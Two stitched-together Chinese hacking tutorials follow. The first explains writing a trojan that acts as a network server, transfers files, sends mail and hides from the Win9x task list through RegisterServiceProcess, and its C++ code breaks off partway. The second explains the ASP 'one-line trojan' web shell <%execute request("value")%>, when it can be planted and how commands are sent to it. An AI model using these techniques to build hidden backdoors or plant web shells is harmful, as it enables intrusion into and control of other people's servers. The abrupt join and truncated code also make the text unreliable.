Socket的功能是用来使本程序变成一个服务器程序,可以对外服务(对攻击者敞开大门)。Socket最初是在Unix上出现的,后来微软将它引入了Windows中(包括Win98和WinNt);后两个控件的作用是用来使程序具有TransferProtocol文件传输协议)和SMTP(Simple Mail Transfer Protocol简单邮件传输协议)功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。 ?Form窗体是可视的,这当然是不可思议的。不光占去了大量的空间(光一个Form就有300K之大),而且使软件可见,根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form,就像Delp hi用过程实现的小程序一般只有17K左右那样。??我们首先应该让我们的程序能够隐身。双击Form,首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘,其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此,只要将我们的程序在进程数据库中用RegisterServiceProcess()函数注册成服务进程(Service Process)就可以了。不过该函数的声明在Borland预先打包的头文件中没有,那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。?首先判断目标机的操作系统是Win9x还是WinNt:? { DWORD dwVersion =GetVersion();?// 得到操作系统的版本号 if (dwVersion >=0x80000000)?// 操作系统是Win9x,不是WinNt { typedef DWORD (CALLBACK*LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
一句话木马的原理及利用(asp,aspx,php,jsp) 一句话木马的适用环境: 1.服务器的来宾账户有写入权限 2.已知数据库地址且数据库格式为asa或asp 3.在数据库格式不为asp或asa的情况下,如果能将一句话插入到asp文件中也可 一句话木马的工作原理: "一句话木马"服务端(本地的html提交文件) 就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为<%execute request("value")%> 其中value可以自己修改 "一句话木马"客户端(远程服务器上被插入一句话的asp文件) 用来向服务端提交控制数据的,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的asp木马文件 现在先假设在远程主机的TEXT.ASP(客户端)中已经有了<%execute request("value")%>这个语句.)在ASP里<%execute ............")%>意思是执行省略号里的语句.那么如果我写进我们精心构造的语句,它也是会帮我们执行的.就按照这上面的思路,我们就可以在本地构造一个表单内容如下:(//为注释)